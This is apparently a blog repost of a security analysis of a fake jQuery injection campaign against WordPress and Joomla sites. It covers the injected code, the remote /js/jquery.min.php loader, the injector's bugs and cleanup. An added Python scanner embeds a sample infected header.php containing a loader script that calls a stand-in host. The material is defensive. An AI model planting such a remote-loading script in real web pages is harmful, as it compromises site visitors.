lundi 30 novembre 2015

11052015_jquiryInjection_V2

Fake jQuery injections have been popular among hackers since jQuery
itself went mainstream and became one of the most widely adopted
JavaScript libraries.

Every now and then we write about such attacks. Almost every week we see
new fake jQuery domains and scripts that mimic jQuery. For example, one
of the most prevalent malware infections of the last couple of weeks is
the attack that injects a fake jQuery script into the head section of
WordPress and Joomla sites.

The script is injected right before the closing </head> tag and looks
like this:

Fake jQuery script malware in Joomla and WordPress websites (screenshot)

There are a few interesting things about this malware that I want to
talk about here.

Not Obfuscated

Although it infects PHP files, the injected code is JavaScript. The
hackers decided not to obfuscate it, probably to make it less prominent
during manual code reviews. This also helps keep things simple, and as
I'll show later, the attackers need to change the injected code often
and their coding skills are not that great.

Hosting Script on Multiple Compromised Sites

After a 10 second timeout, the JS code dynamically injects another
script that looks like this:
http://infected-site.com/js/jquery.min.php

Where infected-site.com is some compromised third-party site where
hackers placed their malicious scripts. The domain changes from site to
site, and on the same site after reinfections. Literally every site
with the injected JS malware can also be reused to host the
/js/jquery.min.php script.

Bugs in the Malware Injector

As you might have noticed, there are two identical injected scripts in
the screenshot. This happens quite often because of a bug in the malware
injector. It simply looks for the </head> tag and injects the malware
right before it. It doesn't check whether that file already contains
the malicious code.

Since the hackers regularly update the code in order to use new domains
or just reinfect sites that have removed the malware, many infected web
pages contain more than one malicious script - sometimes more than 10 of
them. The same flawed logic makes them inject the script in other
inappropriate places (e.g. inside comments that contain the text
</head>).

Infected Themes and Templates

The main targets of this attack are WordPress and Joomla sites. When
hackers break into such a site, they run a script that looks for all
WordPress and Joomla installations on the compromised server account
and then injects that malicious JavaScript code into the header.php
file in every WordPress theme and into the index.php file in every
Joomla template (or whatever file that has the </head> tag). This makes
the cleanup relatively easy. You just need to remove the malicious code
from header.php (WP) or index.php (Joomla) or just restore them from a
clean backup, plus check for the jquery.min.php in the /js directory.
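The indicators described in the last two sections (scripts stacked right before every `</head>`, identical duplicate blocks, a remote `/js/jquery.min.php` loader, and a dropped `js/jquery.min.php` file) can be turned into a scan of the files this campaign targets. This is an added example, not code from the original post or from Sucuri; the sample header.php and the `infected-site.example` domain are constructed, and the script body is a placeholder, since the real payload appears only in the screenshot.

```python
import re
from collections import Counter
from pathlib import Path

# Constructed sample of an infected header.php (placeholder payload and domain).
# It carries the two traits the post describes: a duplicate script block and a
# second "</head>" inside a comment that the buggy injector would also match.
SAMPLE_HEADER_PHP = """<?php /* theme header */ ?>
<html><head>
<title>Demo</title>
<!-- editor note: markup up to </head> is shared by all pages -->
<script>setTimeout(function(){var s=document.createElement('script');
s.src='http://infected-site.example/js/jquery.min.php';document.head.appendChild(s);},10000);</script>
<script>setTimeout(function(){var s=document.createElement('script');
s.src='http://infected-site.example/js/jquery.min.php';document.head.appendChild(s);},10000);</script>
</head>
<body>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
LOADER_RE = re.compile(r"https?://[^\s\"'<>]+/js/jquery\.min\.php", re.I)
HEAD_CLOSE_RE = re.compile(r"</head>", re.I)

def scan_markup(text):
    """Collect the campaign's indicators from one header.php / index.php."""
    scripts = SCRIPT_RE.findall(text)
    # The injector inserts before every '</head>' (even one inside a comment)
    # and never checks for an existing copy, so duplicates are a strong signal.
    head_closes = [m.start() for m in HEAD_CLOSE_RE.finditer(text)]
    before_head = sum(1 for pos in head_closes
                      if text[:pos].rstrip().lower().endswith("</script>"))
    return {
        "head_close_count": len(head_closes),
        "duplicate_script_blocks": sum(1 for n in Counter(scripts).values() if n > 1),
        "scripts_before_head_close": before_head,
        "loader_urls": sorted(set(LOADER_RE.findall(text))),
    }

def is_suspicious(report):
    return bool(report["loader_urls"]) or report["duplicate_script_blocks"] > 0

def scan_site(root):
    """Scan the files the post names as targets, plus any dropped loader file."""
    root = Path(root)
    targets = list(root.glob("wp-content/themes/*/header.php")) + \
              list(root.glob("templates/*/index.php"))
    findings = {str(p): scan_markup(p.read_text(errors="ignore")) for p in targets}
    dropped = [str(p) for p in root.rglob("js/jquery.min.php")]
    return findings, dropped
```

`scan_site("/path/to/account")` walks every theme and template under the account, which matches how the injector itself spreads; a non-empty `dropped` list means the account is also being used to host the loader for other sites.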

To check if you're infected, you can leverage our free malware scanner,
SiteCheck. Here is what the output may look like:

Massive Malware Campaign Targets WordPress and Joomla (screenshot)
